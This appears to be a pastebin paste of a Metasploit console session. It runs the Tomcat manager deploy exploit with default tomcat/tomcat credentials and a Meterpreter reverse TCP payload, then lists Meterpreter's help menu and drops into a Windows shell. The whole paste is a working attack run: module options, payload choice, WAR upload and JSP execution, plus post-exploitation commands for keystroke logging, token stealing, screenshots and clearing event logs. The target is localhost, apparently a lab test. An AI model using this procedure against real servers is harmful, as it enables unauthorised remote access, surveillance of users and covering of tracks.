Untitled

a guest
Jun 22nd, 2017
msf exploit(tomcat_mgr_deploy) > show options

Module options:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  tomcat           no        The password for the specified username
   PATH      /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
   Proxies                    no        Use a proxy chain
   RHOST     localhost        yes       The target address
   RPORT     8080             yes       The target port
   USERNAME  tomcat           no        The username to authenticate as
   VERBOSE   false            no        Enable verbose output
   VHOST                      no        HTTP server virtual host


Payload options (java/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  127.0.0.1        yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Java Universal


msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > exploit

[*] Started reverse handler on 127.0.0.1:4444
[*] Using manually select target "Java Universal"
[*] SHELL set to cmd.exe
[*] Uploading 6309 bytes as 6uD9BUvXfIr8OfmpwRvokVMxtdpHH.war ...
[*] Executing /6uD9BUvXfIr8OfmpwRvokVMxtdpHH/tO3s8i.jsp...
[*] Undeploying 6uD9BUvXfIr8OfmpwRvokVMxtdpHH ...
[*] Sending stage (26938 bytes) to 127.0.0.1
[*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:11545) at 2010-10-22 23:09:00 +0100


meterpreter >
meterpreter > help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    background    Backgrounds the current session
    bgkill        Kills a background meterpreter script
    bglist        Lists running background scripts
    bgrun         Executes a meterpreter script as a background thread
    channel       Displays information about active channels
    close         Closes a channel
    exit          Terminate the meterpreter session
    help          Help menu
    interact      Interacts with a channel
    irb           Drop into irb scripting mode
    migrate       Migrate the server to another process
    quit          Terminate the meterpreter session
    read          Reads data from a channel
    run           Executes a meterpreter script
    use           Load a one or more meterpreter extensions
    write         Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    del           Delete the specified file
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    clearev       Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getpid        Get the current process identifier
    getprivs      Get as many privileges as possible
    getuid        Get the user that the server is running as
    kill          Terminate a process
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    sysinfo       Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreters current desktop
    uictl          Control some of the user interface components

meterpreter > cat ...
Unknown request detected:
TLV_TYPE_METHOD = stdapi_railgun_api
TLV_TYPE_REQUEST_ID = 56807978639825980098238633155564
0x24E21 = 0
0x44E22 = (raw data, 0 bytes)
0x44E23 = (raw data, 0 bytes)
0x44E24 = (raw data, 0 bytes)
0x14E29 = shell32
0x14E2A = IsUserAnAdmin
meterpreter > shell
Process 1 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

D:\Progs-Michi\apache-tomcat-6.0.26\bin>exit
meterpreter >